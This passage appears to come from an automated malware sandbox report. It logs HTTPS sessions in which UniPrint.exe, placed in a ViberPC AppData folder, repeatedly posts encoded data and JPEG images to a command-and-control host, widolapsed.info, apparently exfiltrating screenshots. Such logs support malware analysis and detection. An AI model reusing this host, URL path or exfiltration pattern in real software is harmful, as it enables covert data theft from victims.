                                                                                                      2021-09-15 11:46:53 UTC3362OUTData Raw: 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f f7 a5 6f ce 9b e7 48 dd 5c 9f c6 ab d3 96 af d9 c5 6c 89 55 a6 f7 64 bb 89 ea 4d 2e 69 a2 96 95 8b 52 6c 75
                                                                                                      Data Ascii: :R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/oH\lUdM.iRlu
                                                                                                      2021-09-15 11:46:53 UTC3378OUTData Raw: 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16 1f 9a 33 4d a3 34 ee 2b 0e cd 26 69 b4 b9 a5 71 d8 5c d2 e6 9b 49 9a 2e 16 1d 46 69 33 45 17 0b 0e cd
                                                                                                      Data Ascii: %Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64.3M4+&iq\I.Fi3E
                                                                                                      2021-09-15 11:46:53 UTC3388OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 37 39 35 32 39 30 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3157952906--
                                                                                                      2021-09-15 11:46:55 UTC3388INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:54 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=604e277c7db07013ab15a278c88c4a71d701b08f48e2238569e6e160f2c4daa3; expires=Thu, 15-Sep-2022 11:46:54 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:55 UTC3389INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.34975745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:30 UTC390OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83326
                                                                                                      Content-Type: multipart/form-data; boundary=--------2112300367
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:30 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 31 32 33 30 30 33 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2112300367Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:30 UTC390OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b6 bc 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:30 UTC391OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:30 UTC407OUTData Raw: 3d 45 5c 35 4d 8f ef 5f fd e3 5f 2f 51 2d cf 5e 2c 91 4d 78 c6 bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 99 4d 78 ce bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e
                                                                                                      Data Ascii: =E\5M__/Q-^,Mx#_RfMx#_Rf)i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n
                                                                                                      2021-09-15 11:45:30 UTC423OUTData Raw: ff 00 a6 cb fe f5 33 4e ff 00 8f e8 be b4 b7 67 37 52 7f bd 58 7f cb d2 df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7
                                                                                                      Data Ascii: 3Ng7RX(1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4
                                                                                                      2021-09-15 11:45:30 UTC439OUTData Raw: 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9 cb 57 ec e2 b6 44 aa d3 7b b2 5d c4 f5 26 97 34 d1 4b 4a c5 a9 36 3a 9c 29 b9 a5 cd 22 d3 1d 9a 70 35 1d 3c 52 68 a4 c7 d2 8a 68 a5 a9 34 4c 75 38 53 01 a7 64 52 29 31 d9 a7 0a 66 69 72 6a 5a 2d 32 4a 29 a0 9a 5f a9 a4 d1 49 8f 14 b9 15 1e f4 1d 58 7e 74 c6 b9 81 3a b8 34 b9 58 73 a5 d4 b2 0f ca 7e 95 c6 78 a3 fe 3f 62 ff 00 ae 42 ba 63 a9 40 b9 03 26 b9 9f 12 9c dd c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c
                                                                                                      Data Ascii: WVuKMt2xmMnOUWD{]&4KJ6:)"p5<Rhh4Lu8SdR)1firjZ-2J)_IX~t:4Xs~x?bBc@&uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),
                                                                                                      2021-09-15 11:45:30 UTC455OUTData Raw: fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d3 25 bb be 80 23 cf 69 6c 23 69 11 09 4b 86 24 6e 60 b9 c1 41 9e be b4 f9 1f f4 d0 b9 d7 f4 99 7e 8a 28 a8 2c 2b ca fe
                                                                                                      Data Ascii: nG4LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2O%#il#iK$n`A~(,+
                                                                                                      2021-09-15 11:45:30 UTC470OUTData Raw: 9d ff 00 fc 2c 4b 7f 23 ec ff 00 d9 2d b3 6e cf 33 cd 1b b1 8c 67 18 eb ed 9f c6 a8 ea 7e 33 86 e7 43 b8 d2 ed ec df 6c e3 fd 6b b8 04 72 0f dd 19 f4 f5 ae 3a 8a 5c aa cd 77 77 17 2a e6 52 ec ac 14 b4 94 b4 ca 0a f6 ad 0f 5c d1 27 f0 85 9d ac 9a bd 9c 12 7d 89 60 71 2c ca ac 8c 13 69 f9 49 07 af e7 5e 2b 45 1e 60 d5 d5 99 ec d6 5f d8 56 90 cb 1f fc 24 9a 73 f9 8c a7 3e 72 0c 63 3f ed 7b d6 a4 7e 20 d0 6c 6c 4e ed 6a c6 41 12 96 3b 27 56 63 df 85 04 92 6b c1 68 a8 95 38 ca b3 ac fe 27 a5 ff 00 ad 02 9d a9 d3 54 a3 f0 a0 a2 8a 2a c0 2b d1 bc 29 e3 dd 27 45 f0 e5 ae 9d 75 6f 7a f3 43 bf 73 46 88 54 e5 d9 86 32 c3 b1 af 39 a2 80 3d 77 fe 16 8e 85 ff 00 3e 9a 8f fd fb 4f fe 2e a3 5f 89 5e 1d 59 9a 65 b0 bf 59 1c 61 98 44 80 b7 a6 7e 7e 6b c9 a8 a2 c3 b9 af e2
                                                                                                      Data Ascii: ,K#-n3g~3Clkr:\ww*R\'}`q,iI^+E`_V$s>rc?{~ llNjA;'Vckh8'T*+)'EuozCsFT29=w>O._^YeYaD~~k
                                                                                                      2021-09-15 11:45:30 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 31 32 33 30 30 33 36 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2112300367--
                                                                                                      2021-09-15 11:45:31 UTC472INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:30 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=41f3c356e7ed658eda1b73e87f8d1d8e2c0a1622c4617e1c07acdd5f39691625; expires=Thu, 15-Sep-2022 11:45:30 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:31 UTC472INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.34975845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:31 UTC472OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83305
                                                                                                      Content-Type: multipart/form-data; boundary=--------1747900146
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:31 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 34 37 39 30 30 31 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1747900146Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:31 UTC473OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8d bc 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:31 UTC473OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:31 UTC489OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:31 UTC505OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:31 UTC521OUTData Raw: 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49 b1 d4 e1 4d cd 2e 69 16 98 ec d3 81 a8 e9 e2 93 45 26 3e 94 53 45 2d 49 a2 63 a9 c2 98 0d 3b 22 91 49 8e cd 38 53 33 4b 93 52 d1 69 92 51 4d 04 d2 fd 4d 26 8a 4c 78 a5 c8 a8 f7 a0 ea c3 f3 a6 35 cc 09 d5 c1 a5 ca c3 9d 2e a5 90 7e 53 f4 ae 33 c5 1f f1 fb 17 fd 72 15 d3 1d 4a 05 c8 19 35 cc f8 94 e6 ee 13 ff 00 4c 87 f3 aa 8c 5a dc 14 d4 a5 a1 c5 d1 45 6e 5e 14 87 c2 fa 71 8e 5d 3e 37 9a 17 2f 1b da 86 9a 53 e6 b0 c8 7d 87 18 03 fb c3 a5 70 37 6b 1e ba 57 31 29 43 32 ab 05 62 03 0c 30 07 af 7a ea b5 48 2d e4 f1 44 d6 a4 d8 4b 6f 6e 66 90 5b 5b 5b 79 4c 36 21 60 8e c1 17 39 c6 38 27 bd 55 b6 57 d4 23 b4 92 e1 74 c7 8e f0 cd
                                                                                                      Data Ascii: k}Km\:o#urNZg%V'4ZV-IM.iE&>SE-Ic;"I8S3KRiQMM&Lx5.~S3rJ5LZEn^q]>7/S}p7kW1)C2b0zH-DKonf[[[yL6!`98'UW#t
                                                                                                      2021-09-15 11:45:31 UTC537OUTData Raw: 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e9 92 dd df 40 11 e7 b4 b6 11 b4 88 84 a5 c3 12 37 30 5c e0 a0 cf 5f 5a 7c 8f fa 68 5c eb fa 4c bf 45 14 54 16 15 e5 7f 16 3f e4 33 65 ff 00 5c 0f f3 af 54 af 2b f8 b1 ff 00 21 9b 2f fa e0 7f 9d
                                                                                                      Data Ascii: <O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM@70\_Z|h\LET?3e\T+!/
                                                                                                      2021-09-15 11:45:31 UTC553OUTData Raw: 76 79 9e 68 dd 8c 63 38 c7 5f 6c fe 35 47 53 f1 9c 37 3a 1d c6 97 6f 66 fb 67 1f eb 5d c0 23 90 7e e8 cf a7 ad 71 d4 52 e5 56 6b bb b8 b9 57 32 97 65 60 a5 a4 a5 a6 50 57 b5 68 7a e6 89 3f 84 2c ed 64 d5 ec e0 93 ec 4b 03 89 66 55 64 60 9b 4f ca 48 3d 7f 3a f1 5a 28 f3 06 ae ac cf 66 b2 fe c2 b4 86 58 ff 00 e1 24 d3 9f cc 65 39 f3 90 63 19 ff 00 6b de b5 23 f1 06 83 63 62 77 6b 56 32 08 94 b1 d9 3a b3 1e fc 28 24 93 5e 0b 45 44 a9 c6 55 9d 67 f1 3d 2f fd 68 14 ed 4e 9a a5 1f 85 05 14 51 56 01 5e 8d e1 4f 1e e9 3a 2f 87 2d 74 eb ab 7b d7 9a 1d fb 9a 34 42 a7 2e cc 31 96 1d 8d 79 cd 14 01 eb bf f0 b4 74 2f f9 f4 d4 7f ef da 7f f1 75 1a fc 4a f0 ea cc d3 2d 85 fa c8 e3 0c c2 24 05 bd 33 f3 f3 5e 4d 45 16 1d cd 7f 15 ea 90 6b 5e 23 bb d4 6d 52 44 86 6d 9b 44
                                                                                                      Data Ascii: vyhc8_l5GS7:ofg]#~qRVkW2e`PWhz?,dKfUd`OH=:Z(fX$e9ck#cbwkV2:($^EDUg=/hNQV^O:/-t{4B.1yt/uJ-$3^MEk^#mRDmD
                                                                                                      2021-09-15 11:45:31 UTC554OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 34 37 39 30 30 31 34 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1747900146--
                                                                                                      2021-09-15 11:45:32 UTC554INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:31 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=826ebcf8610b10d2ef33c9c81539d056e24545aa120e2d070e2626fbc0fffa57; expires=Thu, 15-Sep-2022 11:45:31 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:32 UTC554INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34976045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:32 UTC554OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83526
